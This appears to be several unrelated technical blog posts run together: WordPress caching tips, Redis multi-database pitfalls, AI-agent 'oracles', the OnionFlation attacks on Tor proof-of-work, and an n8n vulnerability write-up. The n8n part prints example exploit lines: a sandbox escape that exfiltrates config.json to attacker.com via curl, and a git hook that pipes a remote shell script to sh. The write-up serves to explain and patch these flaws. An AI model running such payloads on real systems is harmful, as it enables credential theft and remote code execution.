if (!codeBlocks.length) return; // no code on this page β don't load anything
function loadHighlighter() {
if (window._hljs_loaded) return;
window._hljs_loaded = true;
var link = document.createElement('link');
link.rel = 'stylesheet';
link.href = '/wp-content/themes/your-theme/css/arcaia-dark.css';
document.head.appendChild(link);
var script = document.createElement('script');
script.src = '/wp-content/plugins/...highlight.min.js';
script.onload = function () { hljs.highlightAll(); };
document.head.appendChild(script);
}
if ('IntersectionObserver' in window) {
var obs = new IntersectionObserver(function (entries) {
entries.forEach(function (e) { if (e.isIntersecting) { loadHighlighter(); obs.disconnect(); } });
});
codeBlocks.forEach(function (el) { obs.observe(el); });
} else {
setTimeout(loadHighlighter, 2000); // fallback for older browsers
}
});
Async Load Non-Critical CSS
Google Fonts, icon libraries, and syntax-highlight stylesheets are not needed before the first paint. The media="print" trick loads them asynchronously: a print stylesheet is non-blocking, and the onload handler switches it to all once it has downloaded.
Important caveat: do not async-load any CSS that controls above-the-fold layout. If Bootstrap or your grid system loads asynchronously, elements will visibly jump as it arrives, spiking your CLS score. Layout-critical CSS must stay synchronous or be inlined in the <head>.
Remove Unused Block Library CSS
If you don’t use Gutenberg blocks on the front-end, WordPress is loading wp-block-library.css (and related stylesheets) on every page for nothing. Dequeue them:
Deferred vs blocking scripts: the same assets, in the same order, with a completely different effect on main-thread availability.
Layer 4: Browser Caching and Static Asset Versioning
Every returning visitor should get CSS, JS, fonts, and images from their local browser cache, not your server. Without explicit cache headers, most browsers apply heuristic caching, which is inconsistent and often too short. Set them explicitly in .htaccess:
<IfModule mod_expires.c>
ExpiresActive On
ExpiresByType text/css "access plus 1 year"
ExpiresByType application/javascript "access plus 1 year"
ExpiresByType image/jpeg "access plus 1 year"
ExpiresByType image/png "access plus 1 year"
ExpiresByType image/webp "access plus 1 year"
ExpiresByType font/woff2 "access plus 1 year"
ExpiresByType text/html "access plus 1 hour"
</IfModule>
<IfModule mod_headers.c>
<FilesMatch "\.(css|js|jpg|jpeg|png|webp|woff2|gif|ico|svg)$">
Header set Cache-Control "public, max-age=31536000, immutable"
</FilesMatch>
</IfModule>
One year is fine for assets provided you bust the cache when they change. The standard approach: append a version query string. The common mistake in WordPress themes is using time() as the version, which generates a new query string on every page load and defeats caching entirely:
// β This busts the cache on every single request
wp_enqueue_style( 'my-theme', get_stylesheet_uri(), [], time() );
// β This respects the cache until you actually change the file
wp_enqueue_style( 'my-theme', get_stylesheet_uri(), [], '1.2.6' );
“The ‘immutable’ extension in a Cache-Control response header indicates to a client that the response body will not change over timeβ¦ clients should not send conditional revalidation requests for the response.” β RFC 8246, HTTP Immutable Responses
When These Optimisations Are Overkill
Not every site needs all of this. If you run a private internal tool, a staging site, or a low-traffic blog where perceived performance genuinely doesn’t matter, a full caching stack is added complexity for no real user benefit. Redis and WP Super Cache both introduce cache invalidation problems: publish a post, and the homepage is stale until the next warm-up. For a site with a small team editing content frequently, you’ll spend more time debugging stale pages than you save in load times.
Similarly, the async CSS trick is wrong for sites where the theme’s layout CSS is above-the-fold critical. Apply it only to supplementary stylesheets like icon libraries and syntax themes. When in doubt, keep layout CSS synchronous and async everything else.
What to Check Right Now
Run PageSpeed Insights β pagespeed.web.dev on your homepage. Identify your worst metric: is it TBT (JavaScript), LCP (images or no cache), or CLS (missing dimensions)?
Check image sizes β find /var/www/html/wp-content/uploads -name "*.jpg" -size +500k | wc -l from inside your container. If the count is more than 0, start with mogrify.
Verify OPcache β php -r "var_dump(opcache_get_status()['opcache_enabled']);" inside the PHP container. Should be bool(true).
Check for jquery-migrate β view source on your homepage and search for jquery-migrate in the script tags. If it is there and your theme doesn’t need legacy jQuery, remove it.
Check time() in enqueue calls β grep -r "time()" wp-content/themes/your-theme/. Replace any occurrence used as a version number with a static string.
Verify Cache-Control headers β curl -I https://yourdomain.com/wp-content/themes/your-theme/style.css | grep -i cache. You should see max-age=31536000.
Check for full-page caching β curl -s -I https://yourdomain.com/ | grep -i x-cache. If WP Super Cache is working, the response should come back in under 20 ms from a warm cache.
Protect your theme from WP updates β add Update URI: false to style.css and use a must-use plugin to filter site_transient_update_themes if the theme has a unique slug that could match a public theme.
Redis is one of those tools you adopt on a Monday and depend on completely by Thursday. It’s fast, it’s simple, and its data structures make your brain feel big. But buried inside Redis is a feature that has been silently causing production incidents for years: multiple logical databases within a single instance. You’ve probably used it. You might be using it right now. And there’s a very good chance it’s going to bite you at the worst possible moment.
Multiple Redis databases: they look separate, but they live in the same house and share everything
What Redis Databases Actually Are
Redis ships with 16 databases numbered 0 through 15. You switch between them using the SELECT command. Each database has its own keyspace, which means keys named user:1 in database 0 are completely separate from user:1 in database 5. On the surface this looks like proper isolation. It is not.
The Redis documentation itself is blunt about this. From the official docs on SELECT:
“Redis databases should not be used as a way to separate different application data. The proper way to do this is to use separate Redis instances.” β Redis documentation, SELECT command
This isn’t buried in a footnote. It’s right there in the command reference. And yet, multiple databases are everywhere in production. Why? Because they’re convenient. Running one Redis process is simpler than running three. And the keyspace separation looks exactly like the isolation you actually need.
# This looks clean and organised
redis-cli SELECT 0 # application sessions
redis-cli SELECT 5 # background pipeline processing
redis-cli SELECT 10 # lightweight caching
# What you think you have: three isolated stores
# What you actually have: three buckets in one leaking tank
The Shared Resource Problem: What Actually Goes Wrong
Every Redis database within a single instance shares the same server process. That means one pool of memory, one CPU thread (Redis is single-threaded for commands), one network socket, one set of configuration limits. When you SELECT a different database number, you’re not switching to a different process. You’re just telling Redis to look in a different keyspace. The underlying machinery is identical.
Kleppmann in Designing Data-Intensive Applications explains why this matters at a systems level: shared resources without isolation boundaries mean a fault in one subsystem propagates to all others. He’s talking about distributed systems broadly, but the principle applies here with brutal precision. Your databases are not subsystems. They are namespaces sharing a single subsystem.
Here is what that looks like in practice.
Case 1: Memory Eviction Wipes Your Cache
You configure a single Redis instance with maxmemory 4gb and maxmemory-policy allkeys-lru. You use database 5 for pipeline job queues and database 10 for caching API responses. Your pipeline goes through a burst period and starts writing thousands of large job payloads into database 5.
# redis.conf
maxmemory 4gb
maxmemory-policy allkeys-lru
# Your pipeline flooding database 5
import redis
r = redis.Redis(db=5)
for job in burst_of_10k_jobs:
r.set(f"job:{job.id}", job.payload, ex=3600) # big payloads
# Meanwhile in your web app...
cache = redis.Redis(db=10)
result = cache.get("api:products:page:1") # returns None β evicted
# Cache miss. Your DB gets hammered.
When Redis hits the memory limit it runs LRU eviction across all keys in all databases. It doesn’t know or care that database 10’s cache keys are serving live user traffic. It just evicts whatever is least recently used. Your carefully populated cache gets gutted to make room for the pipeline. Cache hit rate goes from 85% to 12%. Your database gets hammered. Everyone’s pager goes off at 2am.
This is not a hypothetical. It’s a well-documented operational failure mode.
Case 2: FLUSHDB Takes Down More Than You Planned
You’re cleaning up stale test data. You connect to what you think is the test database and run FLUSHDB. Redis flushes database 0. Your sessions are in database 0. Your production users are now all logged out simultaneously.
# Developer runs this thinking they're on the test DB
redis-cli -n 0 FLUSHDB
# But your sessions were also on DB 0
# Every logged-in user just got kicked out
# Support tickets: many
With separate instances, this failure mode is impossible. You’d have to explicitly connect to the production instance and deliberately flush it. The separate instance is an actual boundary. The database number is just a label.
Case 3: FLUSHALL Is Always a Disaster
Someone runs FLUSHALL to clean up a database. FLUSHALL wipes every database in the instance. It doesn’t ask which one. If all your databases are in one Redis instance, this single command takes out everything: your sessions, your pipeline queues, your caches, your temporary data. Everything. Simultaneously.
# Looks like it's cleaning just one thing
redis-cli FLUSHALL # deletes EVERY database (0 through 15)
# Equivalent damage: one wrong command vaporises
# db 0: sessions β all users logged out
# db 5: pipeline β all queued jobs lost
# db 10: cache β cache cold, DB under full load
Case 4: A Slow Operation Blocks Everything
Redis is single-threaded for command execution. A slow operation in one database blocks commands in all other databases. You’re running a large KEYS * scan in database 5 during maintenance (yes, you know not to do this, but someone does it anyway). It takes 800ms. For 800ms, every GET in database 10 queues up. Your cache layer is unresponsive. Your application timeout counters tick.
# Someone runs this on db 5 "just to debug something"
redis-cli -n 5 KEYS "*pipeline*"
# Returns after 800ms
# During those 800ms, database 10 clients are blocked:
cache.get("user:session:abc123") # waiting... waiting...
# Your app's 500ms timeout fires
# HTTP 504 responses hit your users
With separate instances, a blocked db 5 instance doesn’t touch db 10’s instance. The processes are independent.
One process, one thread, one memory pool: a bad day in database 5 is a bad day everywhere
The Redis Cluster Problem: A Hard Wall
Here’s a constraint that isn’t optional or configurable. Redis Cluster, which is the standard approach for horizontal scaling and high availability in production, only supports database 0.
“Redis Cluster supports a single database, and the SELECT command is not allowed.” β Redis Cluster specification
If you’ve built your application around multiple database numbers and you later need to scale horizontally with Redis Cluster, you’re stuck. You have to refactor your data access layer, migrate your keys, and retest everything. The cost of the “convenient” multi-database approach arrives as a large refactoring bill exactly when you can least afford it: when your traffic is growing.
The Proper Pattern: Separate Instances
The correct approach is to run a separate Redis instance for each logical use case. This is not complicated. Redis has a tiny footprint. Running three instances uses almost no additional overhead compared to running one with three databases.
# redis-pipeline.conf
port 6380
maxmemory 1gb
maxmemory-policy noeviction # pipeline jobs must NOT be evicted
save 900 1 # persist pipeline jobs to disk
# redis-cache.conf
port 6381
maxmemory 2gb
maxmemory-policy allkeys-lru # cache should evict LRU freely
save "" # no persistence needed for cache
# redis-sessions.conf
port 6382
maxmemory 512mb
maxmemory-policy volatile-lru # only evict keys with TTL set
save 60 1000 # persist sessions more aggressively
Notice what this gives you that you absolutely cannot have with multiple databases. Each instance has its own maxmemory and its own maxmemory-policy. Your pipeline instance uses noeviction because job loss is unacceptable. Your cache instance uses allkeys-lru because cache misses are fine. Your session instance uses volatile-lru and persists aggressively. These policies are mutually exclusive requirements. You cannot satisfy them with a single configuration file.
# Application connections β clean and explicit
import redis
pipeline_redis = redis.Redis(host='localhost', port=6380)
cache_redis = redis.Redis(host='localhost', port=6381)
session_redis = redis.Redis(host='localhost', port=6382)
# Now a pipeline burst doesn't evict cache entries
# A FLUSHDB on cache doesn't touch sessions
# A slow pipeline scan doesn't block session lookups
# Each can scale, replicate, and fail independently
The Pragmatic Programmer’s core principle of orthogonality applies perfectly here: components that have nothing to do with each other should not share internal state. Your pipeline and your cache are orthogonal concerns. Coupling them through a shared Redis process violates that principle, and you pay for the violation eventually.
Separate instances: different ports, different configs, different memory policies, zero cross-contamination
How to Migrate Away From Multiple Databases
If you’re already using multiple databases in production, the migration is straightforward but requires care. Here’s the logical path.
Step 1: Inventory your databases. Connect to your Redis instance and check what’s actually living in each database.
# Check key counts per database
redis-cli INFO keyspace
# Output shows something like:
# db0:keys=1240,expires=1100,avg_ttl=86300000
# db5:keys=340,expires=340,avg_ttl=3598000
# db10:keys=5820,expires=5820,avg_ttl=299000
Step 2: Start new instances before touching the old one. Spin up your new Redis instances with appropriate configs for each use case. Don’t migrate anything yet.
Step 3: Dual-write during transition. Update your application to write to both the old database number and the new dedicated instance. Reads still come from the old instance. This gives you a warm new instance without a cold-start cache miss storm.
# Transition period: write to both, read from old
def set_cache(key, value, ttl):
old_redis.select(10)
old_redis.setex(key, ttl, value)
new_cache_redis.setex(key, ttl, value) # warm the new instance
def get_cache(key):
return old_redis.get(key) # still reading from old
Step 4: Flip reads, then remove dual-write. Once the new instance has a reasonable warm state, flip reads to the new instance. Monitor cache hit rates. Once stable for a day or two, remove the dual-write to the old database number.
Step 5: Verify and clean up. After all traffic is on dedicated instances, verify the old database numbers are empty and decommission them.
The migration path: inventory, spin up, dual-write, flip, clean up
When Multiple Databases Are Actually Fine
It would be unfair to say multiple databases are always wrong. There are genuine use cases:
Local development and unit tests β when you want to isolate test data from dev data on a single machine without the overhead of multiple processes. Database 0 for your running dev server, database 1 for tests that get flushed between runs.
Organisational separation within a single application β separating sessions, cache, and queues within one application that has identical resource requirements and tolerates the same eviction policy. This is the original intended use case.
Very small applications with negligible traffic β where the Redis instance is nowhere near its limits and you simply want namespace separation without the operational overhead.
The moment you have meaningfully different workloads, different eviction requirements, or need horizontal scaling, multiple databases stop being an organisational convenience and start being a liability.
What to Check Right Now
Run INFO keyspace β if you see more than db0 in production with significant key counts, you have work to do.
Check your maxmemory-policy β one policy cannot serve all use cases correctly. If you have both pipeline jobs and cache data, you need different policies.
Check for Redis Cluster in your roadmap β if it’s there, multiple databases will block you. Start planning the migration now, before you need to scale.
Audit your FLUSHDB and FLUSHALL usage β in scripts, Makefiles, CI pipelines, anywhere. Know exactly what would be affected if one of those runs in the wrong context.
Review slow query logs β check if slow commands in one database are causing latency spikes visible in your application metrics at the same timestamps.
Redis is an extraordinary tool. It earns its place in almost every production stack. But its database feature was designed for a simpler era when “run one Redis for everything” was the standard advice. The standard has moved on. Your architecture should too.
An “oracle” in this context is a component that knows something the LLM doesn’t β typically the structure of the system. The agent edits code or config; the oracle has a formal model (e.g. states, transitions, invariants) and can answer questions like “is there a stuck state?” or “does every path have a cleanup?” The oracle doesn’t run the code; it reasons over the declared structure. So the agent has a persistent, queryable source of truth that survives across sessions and isn’t stored in the model’s context window. That’s “persistent architectural memory.”
Why it helps: the agent (or the human) can ask the oracle before or after a change. “If I add this transition, do I introduce a dead end?” “Which states have no error path?” The oracle answers from the formal model. So you’re not relying on the agent to remember or infer the full structure; you’re relying on a dedicated store that’s updated when the structure changes and queried when you need to verify or plan. The agent stays in the “how do I implement?” role; the oracle is in the “what is the shape?” role.
Building an oracle means maintaining a representation of the system (states, transitions, maybe invariants) that stays in sync with the code or config. That can be manual (you write the spec) or semi-automated (the agent or a tool proposes updates to the spec when code changes). The oracle then runs checks or answers queries over that representation. For agentic systems, the oracle is the “memory” that the agent lacks: a place to look up structural facts instead of re-deriving them from source every time.
The approach is especially useful when multiple agents or humans work on the same codebase. The oracle is the single source of truth for “what’s the intended structure?” so that everyone β human or agent β can check their changes against it.
Expect more tooling that provides oracle-like structural views and checks, and tighter integration with agentic workflows so that agents can query before they act.
Tor’s proof-of-work puzzle system was designed as the one reliable defence against denial-of-service attacks on onion services. It was clever, it worked, and then a group of security researchers spent the better part of a year figuring out how to turn it into a weapon. The resulting family of attacks, dubbed OnionFlation, can take down any onion service for roughly $1.20 upfront and 10 cents an hour to maintain. The Tor project has acknowledged the issue. It is not yet patched.
OnionFlation: weaponising Tor’s proof-of-work defence against the users it was built to protect.
Why Onion Services Have Always Been a DoS Magnet
Before understanding OnionFlation, you need to understand the original problem it was supposed to solve. Onion services have always been disproportionately easy to knock offline, and the reason is architectural. On the clearnet, denial-of-service defences rely on one thing above all else: knowing who is attacking you. Rate limiting, IP scrubbing, CAPTCHA walls, traffic shaping β all of these require visibility into the source of traffic. An onion service has none of that. The server never sees the client’s IP address; that is the entire point. So every standard DoS mitigation becomes inapplicable in one stroke.
The asymmetry goes further. When a malicious client wants to flood an onion service, it sends high-volume requests to the service’s introduction point over a single Tor circuit. But the server, upon receiving each request, must open a brand new Tor circuit to a different rendezvous point for every single one. Establishing a Tor circuit is computationally expensive: there is a full cryptographic key exchange at each hop. So the attacker pays once per circuit while the server pays once per request. This is the asymmetry that makes regular DoS against onion services so effective, and it has nothing to do with OnionFlation. It is just the baseline condition.
A quick detour is worth it here because the routing model is central to everything that follows. When you connect to a clearnet site over Tor, your traffic passes through three relays: a guard node, a middle node, and an exit node. The exit node then connects directly to the destination server, which sits outside Tor. The server’s IP address is public and the final hop is unencrypted (unless using HTTPS, but that is standard TLS at that point, nothing to do with Tor).
Onion services work differently. The server moves inside the Tor network. Before any clients connect, the server picks three ordinary Tor relays to act as introduction points and opens full three-hop Tor circuits to each of them. It then publishes a descriptor β containing its introduction points and its public key β into a distributed hash table spread across Tor’s network of directory servers. This is how clients discover how to reach the service.
When a client connects, the process looks like this:
# Simplified connection flow for an onion service
1. Client queries the distributed hash table for the onion URL
β receives the list of introduction points
2. Client forms a 3-hop circuit to one introduction point
3. Client randomly selects a rendezvous point (any Tor relay)
β forms a separate 2-hop circuit to it
β sends the rendezvous point a secret "cookie" (a random token)
4. Client sends a message to the introduction point containing:
- the rendezvous point's location
- the cookie
- all encrypted with the server's public key
5. Introduction point forwards the message to the server
6. Server forms a 3-hop circuit to the rendezvous point
β presents the matching cookie
7. Rendezvous point stitches the two circuits together
β client and server complete a cryptographic handshake
β bidirectional encrypted communication begins
The end result is six hops total between client and server, with neither party knowing the other’s IP address. The rendezvous point is just blindly relaying encrypted traffic it cannot read. The price for this mutual anonymity is latency and, critically, the server-side cost of forming new Tor circuits on demand.
Six hops, two stitched circuits, zero IP exposure. The elegance that also creates the attack surface.
Tor’s Answer: Proof-of-Work Puzzles (2023)
In August 2023, after months of sustained DoS attacks against the Tor network, the Tor Project deployed a new defence: proof-of-work puzzles β specified in full in Proposal 327 and documented at the onion services security reference. The mechanism is conceptually simple. Before the server forms a rendezvous circuit, the client must first solve a cryptographic puzzle. The server adjusts the puzzle difficulty dynamically based on observed load, broadcasting the current difficulty level globally via the same distributed hash table used for descriptors.
Critically, the difficulty is global, not per-client. There is a reason for this: giving any individual feedback to a single client would require forming a circuit first, which is exactly the expensive operation we are trying to avoid. So the puzzle difficulty is a single number that all prospective clients must solve before the server will engage with them.
For a legitimate user making a single connection, a few extra seconds is a minor inconvenience. For an attacker trying to flood the server with hundreds of requests per second, the puzzle cost scales linearly and quickly becomes infeasible. The approach brilliantly flips the asymmetry: instead of the server bearing the circuit-formation cost, the attacker now bears a cryptographic puzzle cost for every single request it wants to send. According to the paper, under active attack conditions without PoW, 95% of clients could not connect at all. With PoW active, connection times under the same attack were nearly indistinguishable from a non-attacked baseline. It was, by any measure, a success.
OnionFlation: Weaponising the Defence
The paper Onions Got Puzzled, presented at USENIX Security 2025, identified a fundamental flaw in how the puzzle difficulty update algorithm works. Rather than trying to overpower the puzzle system, the attacks trick the server into raising its own puzzle difficulty to the maximum value (10,000) without actually putting it under meaningful load. Once the difficulty is at maximum, even high-end hardware struggles to solve a single puzzle within Tor Browser’s 90-second connection timeout.
The researchers developed four distinct attack strategies.
Strategy 1: EnRush
The server evaluates its congestion state once every five minutes, then broadcasts a difficulty update. It cannot do this more frequently because each update requires writing to the distributed hash table across Tor’s global relay network; frequent writes would overwhelm it.
The server’s congestion check looks at the state of its request queue at the end of the five-minute window. It checks not just how many requests are queued but their difficulty levels. A single high-difficulty unprocessed request is enough to trigger a large difficulty increase, because the server reasons: “if clients are solving hard puzzles and still can’t get through, congestion must be severe.”
The EnRush attacker simply sends a small burst of high-difficulty solved requests in the final seconds of the measurement window. For the vast majority of the five-minute interval the queue was empty, but the server only checks once. It sees high-difficulty requests sitting unprocessed, panics, and inflates the difficulty to the maximum. Cost: $1.20 per inflation event.
Strategy 2: Temporary Turmoil
Instead of sending a few hard requests, the attacker floods the server with a massive volume of cheap, low-difficulty requests. This exploits a flaw in the difficulty update formula:
The server’s request queue has a maximum capacity. When it fills up, the server discards half the queue to make room. When this happens, the numerator (all arrived requests, including discarded ones) becomes very large, while the denominator (only successfully processed requests) remains low. The formula outputs an absurdly high difficulty. Cost: $2.80.
Strategy 3: Choking
Once the difficulty is inflated to the maximum via EnRush or Temporary Turmoil, the server limits itself to 16 concurrent rendezvous circuit connections. The attacker sends 16 high-difficulty requests but deliberately leaves all 16 connections half-open by refusing to complete the rendezvous handshake. The server’s connection slots are now occupied by dead-end circuits. No new legitimate connections can be accepted even from users who successfully solved the maximum-difficulty puzzle. Cost: approximately $2 per hour to maintain.
Strategy 4: Maintenance
After inflating the difficulty, the attacker needs to stop the server from lowering it again. The server decreases difficulty when it sees an empty queue at the measurement window. The maintenance strategy sends a small trickle of zero-difficulty requests, just enough to keep the queue non-empty. The current implementation counts requests regardless of their difficulty level, so even trivially cheap requests prevent the difficulty from dropping. Cost: 10 cents per hour.
EnRush and Temporary Turmoil inflate the difficulty; Choking and Maintenance hold it there.
The Theorem That Makes This Hard to Fix
The researchers did not just develop attacks. They also proved, mathematically, why this class of problem is fundamentally difficult to solve. This is where the paper becomes genuinely interesting beyond the exploit mechanics.
They demonstrate a perfect negative correlation between two properties any difficulty update algorithm could have:
Congestion resistance: the ability to detect and respond to a real DoS flood, raising difficulty fast enough to throttle the attacker.
Inflation resistance: the ability to resist being tricked into raising difficulty when there is no real load.
Theorem 1: No difficulty update algorithm can be simultaneously resistant to both congestion attacks and inflation attacks.
Maximising one property necessarily minimises the other. Tor’s current implementation sits at the congestion-resistant end of the spectrum, which is why OnionFlation attacks are cheap. Moving toward inflation resistance makes the system more vulnerable to genuine flooding attacks, which is what the PoW system was built to stop in the first place. As Martin notes in Clean Code, a system designed to solve one problem perfectly often creates the conditions for a new class of problem β the same logical structure applies here to protocol design.
The researchers tried five different algorithm tweaks. All of them failed to stop OnionFlation at acceptable cost. The best result pushed the attacker’s cost from $1.20 to $25 upfront and $0.50 an hour, which is still trivially affordable.
The Proposed Fix: Algorithm 2
After exhausting incremental tweaks, the researchers designed a new algorithm from scratch. Instead of taking a single snapshot of the request queue every five minutes, Algorithm 2 monitors the server’s dequeue rate: how fast it is actually processing requests in real time. This makes the difficulty tracking continuous rather than periodic, removing the window that EnRush exploits.
The algorithm exposes a parameter called delta that lets onion service operators tune their own trade-off between inflation resistance and congestion resistance. The results are considerably better:
# With Algorithm 2 (default delta):
# EnRush cost to reach max difficulty: $383/hour (vs $1.20 one-time previously)
# With delta increased slightly by the operator:
# EnRush cost: $459/hour
# Choking becomes moot because EnRush and Temporary Turmoil
# can no longer inflate the difficulty in the first place.
This is a 300x increase in attacker cost under the default configuration. The researchers tested it against the same attacker setup they used to validate the original OnionFlation attacks and found that Algorithm 2 completely prevented difficulty inflation via EnRush and Temporary Turmoil.
That said, the authors are careful to note this is one promising approach, not a proven optimal solution. The proof that no algorithm can fully resolve the trade-off still stands; Algorithm 2 just moves the dial considerably further toward inflation resistance while keeping congestion resistance viable.
Where Things Stand: Prop 362
The researchers responsibly disclosed their findings to the Tor Project in August 2024. The Tor Project acknowledged the issue and shortly afterwards opened Proposal 362, a redesign of the proof-of-work control loop that addresses the exact structural issues identified in the paper. As of the time of writing, Prop 362 is still marked open. The fix is not yet deployed.
The delay reflects the structural difficulty: any change to the global difficulty broadcast mechanism touches the entire Tor relay network, not just onion service code. Testing and rolling out changes at that scale without disrupting the live network is a non-trivial engineering problem, entirely separate from the cryptographic and algorithmic design questions.
What Onion Service Operators Can Do Right Now
The honest answer is: not much, beyond sensible hygiene. The vulnerability is in the PoW difficulty update mechanism, which operators cannot replace themselves. But the following steps reduce your exposure.
Keep Tor updated
When Prop 362 ships, update immediately. Track Tor releases at blog.torproject.org. The fix will be a daemon update.
# Debian/Ubuntu β keep Tor from the official Tor Project repo
apt-get update && apt-get upgrade tor
Do not disable PoW
Disabling proof-of-work entirely (HiddenServicePoWDefensesEnabled 0) removes the only available DoS mitigation and leaves you exposed to straightforward circuit-exhaustion flooding. OnionFlation is bad; unprotected flooding is worse. Leave it on.
Monitor difficulty in real time
If you have Tor’s metrics port enabled, you can track the live puzzle difficulty and get early warning of an inflation attack in progress:
# Watch the suggested effort metric live
watch -n 5 'curl -s http://127.0.0.1:9052/metrics | grep suggested_effort'
# Or pipe directly from the metrics port if configured
# tor config: MetricsPort 127.0.0.1:9052
A sudden jump to 10,000 with no corresponding load spike in your service logs is a strong indicator of an OnionFlation attack rather than a legitimate traffic event.
Keep your service lightweight
Algorithm 2 improves cost for the attacker considerably but does not eliminate inflation attacks entirely. Running a resource-efficient service (minimal memory footprint, fast request handling) means your server survives periods of elevated difficulty with less degradation for users who do manage to solve puzzles and connect.
Redundant introduction points
Tor allows specifying the number of introduction points (default 3, maximum as set in your Tor configuration). More introduction points spread the attack surface somewhat, though this is a marginal benefit since the OnionFlation attack operates via the puzzle difficulty mechanism, not by targeting specific introduction points.
# torrc: set higher introduction point count
# (consult your Tor version docs for exact directive)
HiddenServiceNumIntroductionPoints 5
Hardening steps for onion service operators while waiting for Prop 362 to ship.
Credit to Daniel Boctor for the original live demonstration of this attack, including compiling Tor from source to manually set the puzzle difficulty to 10,000 and showcasing the real-time impact on connection attempts. The full walkthrough is worth watching:
If your workflow automation platform has access to your API keys, your cloud credentials, your email, and every sensitive document in your stack, it had better be airtight. N8N, one of the most popular self-hosted AI workflow tools around, just disclosed three vulnerabilities all rated 9.9 or higher on the CVSS scale. That is not a typo. Three separate critical flaws in the same release cycle. Let us walk through what is actually happening under the hood, why these bugs exist, and what you need to do to fix them.
Three 9.9-severity CVEs in N8N β a case study in why sandboxing arbitrary execution is brutally hard.
What is N8N and Why Does Any of This Matter?
N8N is a workflow automation platform in the spirit of Zapier or Make, but self-hosted and AI-native. You wire together “nodes” β small units that do things like pull from an API, run a script, clone a git repository, or execute Python β into pipelines that automate essentially anything. That last sentence is where the problem lives. When your platform’s entire value proposition is “run arbitrary code against arbitrary APIs”, the attack surface is not small.
The threat model here is not some nation-state attacker with a zero-day budget. It is this: you are running N8N at work, or in your home lab, and several people have accounts at different trust levels. One of those users turns out to be malicious, or simply careless enough to import a workflow from the internet without reading it. The three CVEs below are all authenticated attacks, meaning the attacker already has a login. But once they are in, they can compromise the entire instance and read every credential stored by every other user on the node. If you have ever wondered why the principle of least privilege exists, here is a textbook example.
CVE-2025-68613: JavaScript Template Injection via constructor.constructor
This one is elegant in the most uncomfortable sense. N8N workflows support expression nodes, small blobs of JavaScript that get evaluated to transform data as it flows through the pipeline. The bug is in how these expressions are sanitised before evaluation: they are not, at least not sufficiently.
An authenticated attacker creates a workflow with a malicious “Function” node and injects the following pattern into an expression parameter:
// Inside the malicious workflow's function node
const fn = (function(){}).constructor.constructor('return require("child_process")')();
fn.execSync('curl http://attacker.com/exfil?data=$(cat /data/config.json)', { encoding: 'utf8' });
If you recognise that constructor.constructor pattern, you have probably read about the React Server Components flight protocol RCE from 2024. The idea is the same: if you do not lock down access to the prototype chain, you can climb your way up to the Function constructor and use it to build a new function from an arbitrary string. From there, require('child_process') is just a function call away, and execSync lets you run anything with the same privileges as the N8N process.
The reason this class of bug keeps appearing is that JavaScript’s object model is a graph, not a tree. As Hofstadter might put it in GΓΆdel, Escher, Bach, the system is self-referential by design: functions are objects, objects have constructors, constructors are functions. Trying to sandbox that without a proper allow-list is fighting the language itself.
Climbing the constructor chain: from user expression to arbitrary OS command execution.
N8N supports a Python code node powered by Pyodide, a runtime that compiles CPython to WebAssembly so it can run inside a JavaScript environment. The idea is that by running Python inside WASM, you get a layer of isolation from the host. In theory, reasonable. In practice, the sandbox was implemented as a blacklist.
A blacklist sandbox is the security equivalent of putting up a sign that says “No bicycles, rollerblades, skateboards, or scooters.” The next person to arrive on a unicycle is perfectly within the rules. The correct approach is a whitelist: enumerate exactly what the sandboxed code is allowed to do and deny everything else by default.
In the case of N8N’s Python node, the blacklist missed subprocess.check_output, which is one of the most obvious ways to shell out from Python:
That alone is bad enough. But Pyodide also exposes an internal API that compounds the issue. The runtime has a method called runPython (sometimes surfaced as pyodide.runPythonAsync or accessed via the internal _api object) that evaluates Python code completely outside the sandbox restrictions. So even if the blacklist had been more thorough, an attacker could escape through the runtime’s own back door:
// From within the N8N sandbox, access Pyodide's internal runtime
const pyodide = globalThis.pyodide || globalThis._pyodide;
pyodide._api.runPython(`
import subprocess
subprocess.check_output(['cat', '/proc/1/environ'])
`);
N8N patched the obvious subprocess bypass in version 1.11.1 by making the native Python runner opt-in via an environment variable (N8N_PYTHON_ENABLED). It is disabled by default in patched builds. The Pyodide internal API bypass was disclosed shortly after and addressed in a subsequent patch.
CVE-2026-21877: Arbitrary File Write via the Git Node
The Git node in N8N lets you build workflows that clone repositories, pull updates, and interact with git as part of an automated pipeline. The vulnerability here is an arbitrary file write: an authenticated attacker can craft a workflow that causes a repository to be cloned to an attacker-controlled path on the host filesystem, outside the intended working directory.
The most likely mechanism, based on Rapid7’s write-up, is either a directory traversal in the destination path parameter, or a git hook execution issue. When you clone a repository, git can execute scripts automatically via hooks (.git/hooks/post-checkout, for example). If the N8N process clones an attacker-controlled repository without sanitising hook execution, those scripts run with the privileges of N8N:
# .git/hooks/post-checkout (inside attacker's repo)
#!/bin/sh
curl http://attacker.com/shell.sh | sh
Alternatively, a traversal in the clone target path lets the attacker overwrite arbitrary files in the N8N process’s reach, including config files, plugin scripts, or anything that gets loaded dynamically at runtime. Either way, the result is remote code execution under the N8N service account.
Git hooks or directory traversal in the clone target: two paths to the same outcome.
How to Fix It
Here is what you need to do, in order of priority.
1. Update N8N immediately
All three CVEs are patched. The minimum safe version is 1.11.1 for the Python sandbox fix; check the N8N releases page for the latest. If you are running Docker:
# Pull the latest patched image
docker pull n8nio/n8n:latest
# Or pin to a specific patched version
docker pull n8nio/n8n:1.11.1
# Restart your container
docker compose down && docker compose up -d
2. Disable the native Python runner if you do not need it
In patched builds the native Python execution environment is off by default. Keep it that way unless you explicitly need it. If you do need Python in N8N, add this to your environment and accept the risk of a managed, isolated execution environment:
# In your docker-compose.yml or .env
N8N_RUNNERS_ENABLED=true
N8N_RUNNER_PYTHON_ENABLED=false # leave false unless you need it
3. Never expose N8N to the public internet
All three of these are authenticated attacks, but that does not mean “exposure is fine”. Default credentials, credential stuffing, and phishing are real vectors. Put N8N behind a VPN or a private network interface. If you are on a VPS, a simple firewall rule is the minimum:
# UFW: allow N8N only from your own IP or VPN range
ufw deny 5678
ufw allow from 10.8.0.0/24 to any port 5678 # VPN subnet example
4. Run N8N as a non-privileged user with a restricted filesystem
N8N should not run as root. If it does, any RCE immediately becomes a full server compromise. In Docker, set a non-root user and mount only the volumes N8N actually needs:
services:
n8n:
image: n8nio/n8n:latest
user: "1000:1000"
volumes:
- n8n_data:/home/node/.n8n # only the data volume, nothing else
environment:
- N8N_RUNNERS_ENABLED=true
5. Enforce strict workflow permissions
In N8N’s settings, limit which users can create or modify workflows. The principle of least privilege applies here just as it does anywhere else in your infrastructure. A user who only needs to trigger existing workflows has no business being able to create a Function node.
# Restrict workflow creation to admins only via N8N environment
